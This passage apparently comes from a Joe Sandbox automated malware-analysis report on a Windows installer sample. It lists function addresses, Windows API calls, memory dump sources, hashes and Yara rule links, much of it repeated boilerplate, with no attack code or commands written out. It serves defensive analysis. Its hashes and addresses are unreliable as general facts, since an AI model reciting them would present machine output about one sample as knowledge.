                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                              Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              • Opcode ID: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                              • Instruction ID: 80b1fa8ab317a3fb83bf0bb9afc1fcb2ede285a6b5c9b7890d3d6fe7da01b763
                                                                                                                                                                                              • Opcode Fuzzy Hash: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69B092361C4600AAEE118B50DE49F497A62E7A4702F008138B244640B0CAB200E0DB09
                                                                                                                                                                                              Function 00404253 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                              • Opcode ID: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                              • Instruction ID: 6a6b83ba7992c3eb947fe44f0607646ae594aefa1fc7371f7d6a783f6fb0b7b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EA002754445019BCF015B50DF098057A61F7A4701B114479B5555103596314860EB19
                                                                                                                                                                                              Function 004038D0 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00403703,00000006,?,00000006,00000008,0000000A), ref: 004038DB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                              • Opcode ID: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                              • Instruction ID: f79f1cdd038f729e9031bf35a7c7ad7adb8aafebcc14ea038f42f7e62efb972e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69C0127054070496C1206F759D4F6193E54AB8173BB604776B0B8B10F1C77C4B59595E

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                              • Opcode ID: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                              • Instruction ID: 350e9793ba1948ff1935c4af006ad7833f39553502bf8ecbcf91bc97059cc7bb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C0281B0900209AFDB10DFA4DD85AAE7BB5FB44314F10417AF614BA2E1C7799D92CF58
                                                                                                                                                                                              Function 00404722 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Remove folder: ,00450248,00000000,?,?), ref: 00404889
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404895
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00002000,004048DE), ref: 00405917
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                • Part of subcall function 0040654E: CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00440218,?,?,0000040F,?,00440218,00440218,?,00000001,00440218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                • Part of subcall function 00404ADE: lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                              • String ID: A$Remove folder:
                                                                                                                                                                                              • API String ID: 2624150263-1936035403
                                                                                                                                                                                              • Opcode ID: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                              • Instruction ID: aec38ac33e169681c2ce75898e964705c21f391e9d8eef84a8e49708370a7c65
                                                                                                                                                                                              • Opcode Fuzzy Hash: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CA173B1900208ABDB11AFA5CD45AAF77B8EF84314F10847BF605B62D1D77C99418F6D
                                                                                                                                                                                              Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                              • Opcode ID: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                              • Instruction ID: 6590b0d0bd135a94e5278e34c2007f8374f9804fe0c2ec815525577e7f77d17f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6add73535d334bbd10faeab47eb29d8a703edf5c42766cfe57afeb0baa1f3480
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                              Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                              • Opcode ID: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                              • Instruction ID: 11d43fc069a5ea90b0fea77c2c23c6da8a8dfc92bb9fdb714ff4c9b8b345b962
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D909B2A
                                                                                                                                                                                              Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                              • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                              Function 004072EC Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
